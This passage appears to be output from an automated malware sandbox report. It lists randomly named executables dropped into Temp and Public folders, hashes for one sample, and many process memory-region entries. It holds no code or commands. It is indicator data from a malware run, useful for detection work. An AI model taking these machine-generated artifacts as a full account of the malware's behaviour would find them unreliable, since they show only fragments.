              • \Users\Admin\AppData\Local\Temp\axcsdfa.exe
              • \Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
              • \Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
              • \Users\Admin\AppData\Local\Temp\m15WXhxItf.exe
                MD5

                013db621a3351e3fb049efd2ccad79ff

                SHA1

                a23394ea54dbc5342a77938a2c285ee616185560

                SHA256

                df1bda6183201e4dc1bc6f6425361a565413e71f09da0648b0c82b39786af27a

                SHA512

                1bf6d076677b234c9da7cbc720fc64632b587b4223b5370a7ca3d53c4d59fa59ef117957b1646c92ba80dac332f6c1c313060d35de7236b2585e5bed00d79229

              • \Users\Public\baj.exe
              • \Users\Public\nfv.exe
              • \Users\Public\nfv.exe
              • \Users\Public\vdb.exe
              • \Users\Public\vdb.exe
              • memory/268-8-0x0000000000000000-mapping.dmp
              • memory/560-11-0x0000000000000000-mapping.dmp
              • memory/672-10-0x0000000000000000-mapping.dmp
              • memory/1056-34-0x00000000702C0000-0x00000000709AE000-memory.dmp
                Filesize

                6.9MB

              • memory/1056-108-0x00000000066B0000-0x00000000066B1000-memory.dmp
                Filesize

                4KB

              • memory/1056-30-0x0000000000000000-mapping.dmp
              • memory/1112-299-0x0000000000000000-mapping.dmp
              • memory/1148-17-0x0000000000000000-mapping.dmp
              • memory/1148-23-0x00000000702C0000-0x00000000709AE000-memory.dmp
                Filesize

                6.9MB

              • memory/1148-278-0x0000000006620000-0x0000000006621000-memory.dmp
                Filesize

                4KB

              • memory/1180-68-0x00000000062F0000-0x00000000062F1000-memory.dmp
                Filesize

                4KB

              • memory/1180-67-0x00000000058C0000-0x00000000058C1000-memory.dmp
                Filesize

                4KB

              • memory/1180-62-0x0000000005820000-0x0000000005821000-memory.dmp
                Filesize

                4KB

              • memory/1180-18-0x0000000000000000-mapping.dmp
              • memory/1180-36-0x00000000025C0000-0x00000000025C1000-memory.dmp
                Filesize

                4KB

              • memory/1180-75-0x0000000006410000-0x0000000006411000-memory.dmp
                Filesize

                4KB

              • memory/1180-48-0x0000000002710000-0x0000000002711000-memory.dmp
                Filesize

                4KB

              • memory/1180-22-0x00000000702C0000-0x00000000709AE000-memory.dmp
                Filesize

                6.9MB

              • memory/1180-81-0x0000000006680000-0x0000000006681000-memory.dmp
                Filesize

                4KB

              • memory/1180-42-0x0000000004A00000-0x0000000004A01000-memory.dmp
                Filesize

                4KB

              • memory/1192-268-0x0000000000400000-0x0000000000434000-memory.dmp
                Filesize

                208KB

              • memory/1192-264-0x0000000000400000-0x0000000000434000-memory.dmp
                Filesize

                208KB

              • memory/1192-265-0x0000000000417A8B-mapping.dmp
              • memory/1220-19-0x0000000000000000-mapping.dmp
              • memory/1220-115-0x0000000006690000-0x0000000006691000-memory.dmp
                Filesize

                4KB

              • memory/1220-24-0x00000000702C0000-0x00000000709AE000-memory.dmp
                Filesize

                6.9MB

              • memory/1220-54-0x0000000004920000-0x0000000004921000-memory.dmp
                Filesize

                4KB

              • memory/1304-329-0x0000000000400000-0x0000000000420000-memory.dmp
                Filesize

                128KB

              • memory/1304-330-0x000000000041A684-mapping.dmp
              • memory/1304-332-0x0000000000400000-0x0000000000420000-memory.dmp
                Filesize

                128KB

              • memory/1320-269-0x0000000006600000-0x0000000006601000-memory.dmp
                Filesize

                4KB

              • memory/1320-20-0x0000000000000000-mapping.dmp
              • memory/1320-145-0x0000000006660000-0x0000000006661000-memory.dmp
                Filesize

                4KB

              • memory/1320-270-0x0000000006610000-0x0000000006611000-memory.dmp
                Filesize

                4KB

              • memory/1320-174-0x0000000006380000-0x0000000006381000-memory.dmp
                Filesize

                4KB

              • memory/1320-181-0x00000000063F0000-0x00000000063F1000-memory.dmp
                Filesize

                4KB

              • memory/1320-25-0x00000000702C0000-0x00000000709AE000-memory.dmp
                Filesize

                6.9MB

              • memory/1388-29-0x0000000000000000-mapping.dmp
              • memory/1452-27-0x0000000000000000-mapping.dmp
              • memory/1504-324-0x0000000000000000-mapping.dmp
              • memory/1540-325-0x0000000000000000-mapping.dmp
              • memory/1584-16-0x0000000000000000-mapping.dmp
              • memory/1620-15-0x0000000000000000-mapping.dmp
              • memory/1636-13-0x0000000000000000-mapping.dmp
              • memory/1904-0-0x0000000000000000-mapping.dmp
              • memory/1944-5-0x0000000000000000-mapping.dmp
              • memory/1944-4-0x0000000000000000-mapping.dmp
              • memory/1952-35-0x00000000702C0000-0x00000000709AE000-memory.dmp
                Filesize

                6.9MB

              • memory/1952-32-0x0000000000000000-mapping.dmp
              • memory/1956-367-0x0000000000000000-mapping.dmp
              • memory/2052-492-0x0000000000000000-mapping.dmp
              • memory/2052-418-0x0000000000000000-mapping.dmp
              • memory/2052-588-0x0000000000000000-mapping.dmp
              • memory/2052-586-0x0000000000000000-mapping.dmp
              • memory/2052-466-0x0000000000000000-mapping.dmp
              • memory/2052-584-0x0000000000000000-mapping.dmp
              • memory/2052-582-0x0000000000000000-mapping.dmp
              • memory/2052-580-0x0000000000000000-mapping.dmp
              • memory/2052-578-0x0000000000000000-mapping.dmp
              • memory/2052-576-0x0000000000000000-mapping.dmp
              • memory/2052-574-0x0000000000000000-mapping.dmp
              • memory/2052-464-0x0000000000000000-mapping.dmp
              • memory/2052-462-0x0000000000000000-mapping.dmp
              • memory/2052-572-0x0000000000000000-mapping.dmp
              • memory/2052-570-0x0000000000000000-mapping.dmp
              • memory/2052-568-0x0000000000000000-mapping.dmp
              • memory/2052-460-0x0000000000000000-mapping.dmp
              • memory/2052-566-0x0000000000000000-mapping.dmp
              • memory/2052-564-0x0000000000000000-mapping.dmp
              • memory/2052-562-0x0000000000000000-mapping.dmp
              • memory/2052-560-0x0000000000000000-mapping.dmp
              • memory/2052-558-0x0000000000000000-mapping.dmp
              • memory/2052-556-0x0000000000000000-mapping.dmp
              • memory/2052-554-0x0000000000000000-mapping.dmp
              • memory/2052-552-0x0000000000000000-mapping.dmp
              • memory/2052-550-0x0000000000000000-mapping.dmp
              • memory/2052-548-0x0000000000000000-mapping.dmp
              • memory/2052-546-0x0000000000000000-mapping.dmp
              • memory/2052-544-0x0000000000000000-mapping.dmp
              • memory/2052-542-0x0000000000000000-mapping.dmp
              • memory/2052-458-0x0000000000000000-mapping.dmp
              • memory/2052-456-0x0000000000000000-mapping.dmp
              • memory/2052-540-0x0000000000000000-mapping.dmp
              • memory/2052-454-0x0000000000000000-mapping.dmp
              • memory/2052-538-0x0000000000000000-mapping.dmp
              • memory/2052-536-0x0000000000000000-mapping.dmp
              • memory/2052-452-0x0000000000000000-mapping.dmp
              • memory/2052-534-0x0000000000000000-mapping.dmp
              • memory/2052-532-0x0000000000000000-mapping.dmp
              • memory/2052-530-0x0000000000000000-mapping.dmp
              • memory/2052-528-0x0000000000000000-mapping.dmp
              • memory/2052-526-0x0000000000000000-mapping.dmp
              • memory/2052-524-0x0000000000000000-mapping.dmp
              • memory/2052-450-0x0000000000000000-mapping.dmp
              • memory/2052-522-0x0000000000000000-mapping.dmp
              • memory/2052-520-0x0000000000000000-mapping.dmp
              • memory/2052-518-0x0000000000000000-mapping.dmp
              • memory/2052-516-0x0000000000000000-mapping.dmp
              • memory/2052-514-0x0000000000000000-mapping.dmp
              • memory/2052-512-0x0000000000000000-mapping.dmp
              • memory/2052-510-0x0000000000000000-mapping.dmp
              • memory/2052-508-0x0000000000000000-mapping.dmp
              • memory/2052-416-0x0000000000000000-mapping.dmp
              • memory/2052-506-0x0000000000000000-mapping.dmp
              • memory/2052-504-0x0000000000000000-mapping.dmp
              • memory/2052-502-0x0000000000000000-mapping.dmp
              • memory/2052-500-0x0000000000000000-mapping.dmp
              • memory/2052-468-0x0000000000000000-mapping.dmp
              • memory/2052-498-0x0000000000000000-mapping.dmp
              • memory/2052-496-0x0000000000000000-mapping.dmp
              • memory/2052-494-0x0000000000000000-mapping.dmp
              • memory/2052-490-0x0000000000000000-mapping.dmp
              • memory/2052-488-0x0000000000000000-mapping.dmp
              • memory/2052-486-0x0000000000000000-mapping.dmp
              • memory/2052-484-0x0000000000000000-mapping.dmp
              • memory/2052-482-0x0000000000000000-mapping.dmp
              • memory/2052-448-0x0000000000000000-mapping.dmp
              • memory/2052-480-0x0000000000000000-mapping.dmp
              • memory/2052-478-0x0000000000000000-mapping.dmp
              • memory/2052-446-0x0000000000000000-mapping.dmp
              • memory/2052-444-0x0000000000000000-mapping.dmp
              • memory/2052-442-0x0000000000000000-mapping.dmp
              • memory/2052-414-0x0000000000000000-mapping.dmp
              • memory/2052-440-0x0000000000000000-mapping.dmp
              • memory/2052-476-0x0000000000000000-mapping.dmp
              • memory/2052-474-0x0000000000000000-mapping.dmp
              • memory/2052-397-0x00000000000E0000-0x00000000000E1000-memory.dmp
                Filesize

                4KB

              • memory/2052-398-0x0000000000000000-mapping.dmp
              • memory/2052-399-0x0000000000120000-0x0000000000121000-memory.dmp
                Filesize

                4KB

              • memory/2052-400-0x0000000000000000-mapping.dmp
              • memory/2052-402-0x0000000000000000-mapping.dmp
              • memory/2052-404-0x0000000000000000-mapping.dmp
              • memory/2052-406-0x0000000000000000-mapping.dmp
              • memory/2052-408-0x0000000000000000-mapping.dmp
              • memory/2052-410-0x0000000000000000-mapping.dmp
              • memory/2052-412-0x0000000000000000-mapping.dmp
              • memory/2052-438-0x0000000000000000-mapping.dmp
              • memory/2052-472-0x0000000000000000-mapping.dmp
              • memory/2052-470-0x0000000000000000-mapping.dmp
              • memory/2052-420-0x0000000000000000-mapping.dmp
              • memory/2052-422-0x0000000000000000-mapping.dmp
              • memory/2052-424-0x0000000000000000-mapping.dmp
              • memory/2052-426-0x0000000000000000-mapping.dmp
              • memory/2052-428-0x0000000000000000-mapping.dmp
              • memory/2052-430-0x0000000000000000-mapping.dmp
              • memory/2052-432-0x0000000000000000-mapping.dmp
              • memory/2052-434-0x0000000000000000-mapping.dmp
              • memory/2052-436-0x0000000000000000-mapping.dmp
              • memory/2224-352-0x0000000000000000-mapping.dmp
              • memory/2312-199-0x0000000000000000-mapping.dmp
              • memory/2320-360-0x0000000000000000-mapping.dmp
              • memory/2336-391-0x0000000000F30000-0x0000000000F31000-memory.dmp
                Filesize

                4KB

              • memory/2336-390-0x00000000731E0000-0x00000000738CE000-memory.dmp
                Filesize

                6.9MB

              • memory/2336-387-0x0000000000000000-mapping.dmp
              • memory/2336-393-0x0000000002690000-0x0000000002691000-memory.dmp
                Filesize

                4KB

              • memory/2336-392-0x0000000004980000-0x0000000004981000-memory.dmp
                Filesize

                4KB

              • memory/2336-394-0x0000000005400000-0x0000000005401000-memory.dmp
                Filesize

                4KB

              • memory/2424-101-0x0000000000000000-mapping.dmp
              • memory/2424-104-0x00000000702C0000-0x00000000709AE000-memory.dmp
                Filesize

                6.9MB

              • memory/2424-105-0x00000000003F0000-0x00000000003F1000-memory.dmp
                Filesize

                4KB

              • memory/2424-200-0x00000000006C0000-0x00000000006CD000-memory.dmp
                Filesize

                52KB

              • memory/2424-190-0x00000000044F0000-0x00000000045A0000-memory.dmp
                Filesize

                704KB

              • memory/2432-302-0x0000000000000000-mapping.dmp
              • memory/2472-378-0x0000000002700000-0x0000000002701000-memory.dmp
                Filesize

                4KB

              • memory/2472-381-0x0000000005420000-0x0000000005421000-memory.dmp
                Filesize

                4KB

              • memory/2472-379-0x00000000049A0000-0x00000000049A1000-memory.dmp
                Filesize

                4KB

              • memory/2472-380-0x0000000002800000-0x0000000002801000-memory.dmp
                Filesize

                4KB

              • memory/2472-377-0x00000000731E0000-0x00000000738CE000-memory.dmp
                Filesize

                6.9MB

              • memory/2472-374-0x0000000000000000-mapping.dmp
              • memory/2476-107-0x000007FEF7B80000-0x000007FEF7DFA000-memory.dmp
                Filesize

                2.5MB

              • memory/2548-111-0x0000000000000000-mapping.dmp
              • memory/2592-119-0x0000000000000000-mapping.dmp
              • memory/2608-121-0x0000000000000000-mapping.dmp
              • memory/2632-277-0x0000000000000000-mapping.dmp
              • memory/2632-284-0x0000000000A50000-0x0000000000A51000-memory.dmp
                Filesize

                4KB

              • memory/2632-288-0x0000000000280000-0x0000000000281000-memory.dmp
                Filesize

                4KB

              • memory/2632-280-0x00000000702C0000-0x00000000709AE000-memory.dmp
                Filesize

                6.9MB

              • memory/2632-326-0x0000000000290000-0x00000000002B4000-memory.dmp
                Filesize

                144KB

              • memory/2640-125-0x0000000000000000-mapping.dmp
              • memory/2692-132-0x0000000000400000-0x0000000000498000-memory.dmp
                Filesize

                608KB

              • memory/2692-133-0x000000000043FCC3-mapping.dmp
              • memory/2692-135-0x0000000000400000-0x0000000000498000-memory.dmp
                Filesize

                608KB

              • memory/2728-237-0x00000000005D0000-0x00000000005D1000-memory.dmp
                Filesize

                4KB

              • memory/2728-233-0x0000000000AB0000-0x0000000000AB1000-memory.dmp
                Filesize

                4KB

              • memory/2728-248-0x0000000001FB0000-0x0000000002001000-memory.dmp
                Filesize

                324KB

              • memory/2728-231-0x00000000702C0000-0x00000000709AE000-memory.dmp
                Filesize

                6.9MB

              • memory/2728-229-0x0000000000000000-mapping.dmp
              • memory/2784-148-0x0000000000000000-mapping.dmp
              • memory/2812-164-0x0000000000400000-0x0000000000439000-memory.dmp
                Filesize

                228KB

              • memory/2812-156-0x0000000000400000-0x0000000000439000-memory.dmp
                Filesize

                228KB

              • memory/2812-159-0x0000000000417A8B-mapping.dmp
              • memory/2828-155-0x0000000000000000-mapping.dmp
              • memory/2896-165-0x0000000000400000-0x0000000000425000-memory.dmp
                Filesize

                148KB

              • memory/2896-167-0x000000000041A684-mapping.dmp
              • memory/2896-170-0x0000000000400000-0x0000000000425000-memory.dmp
                Filesize

                148KB

              • memory/2952-358-0x00000000002F0000-0x00000000002F1000-memory.dmp
                Filesize

                4KB

              • memory/2952-361-0x0000000000300000-0x0000000000312000-memory.dmp
                Filesize

                72KB

              • memory/2952-362-0x0000000000390000-0x0000000000395000-memory.dmp
                Filesize

                20KB

              • memory/2952-349-0x0000000000850000-0x0000000000851000-memory.dmp
                Filesize

                4KB

              • memory/2952-347-0x00000000731E0000-0x00000000738CE000-memory.dmp
                Filesize

                6.9MB

              • memory/2952-344-0x0000000000000000-mapping.dmp
              • memory/2952-364-0x0000000004BE0000-0x0000000004BE2000-memory.dmp
                Filesize

                8KB

              • memory/2952-369-0x0000000004BE0000-0x0000000004BE2000-memory.dmp
                Filesize

                8KB

              • memory/2952-245-0x0000000000000000-mapping.dmp
              • memory/2984-386-0x00000000004F0000-0x0000000000513000-memory.dmp
                Filesize

                140KB

              • memory/2984-338-0x0000000000EA0000-0x0000000000EA1000-memory.dmp
                Filesize

                4KB

              • memory/2984-337-0x00000000731E0000-0x00000000738CE000-memory.dmp
                Filesize

                6.9MB

              • memory/2984-388-0x0000000000690000-0x00000000006B4000-memory.dmp
                Filesize

                144KB

              • memory/2984-334-0x0000000000000000-mapping.dmp
              • memory/3000-178-0x0000000000417A8B-mapping.dmp
              • memory/3008-246-0x0000000000000000-mapping.dmp
              • memory/3016-281-0x00000000026A0000-0x00000000026A4000-memory.dmp
                Filesize

                16KB

              • memory/3016-252-0x0000000000000000-mapping.dmp
              • memory/3016-186-0x000000000043FCC3-mapping.dmp
              • memory/3036-356-0x0000000001190000-0x0000000001191000-memory.dmp
                Filesize

                4KB

              • memory/3036-373-0x0000000000AB0000-0x0000000000AC0000-memory.dmp
                Filesize

                64KB

              • memory/3036-355-0x00000000731E0000-0x00000000738CE000-memory.dmp
                Filesize

                6.9MB

              • memory/3036-359-0x00000000002B0000-0x00000000002B1000-memory.dmp
                Filesize

                4KB

              • memory/3036-363-0x00000000002C0000-0x00000000002D1000-memory.dmp
                Filesize

                68KB

              • memory/3036-370-0x0000000000610000-0x0000000000613000-memory.dmp
                Filesize

                12KB

              • memory/3036-351-0x0000000000000000-mapping.dmp
              • memory/3036-189-0x000000000041A684-mapping.dmp
              • memory/3068-341-0x0000000000000000-mapping.dmp
              • memory/3068-396-0x0000000002D90000-0x0000000002DDC000-memory.dmp
                Filesize

                304KB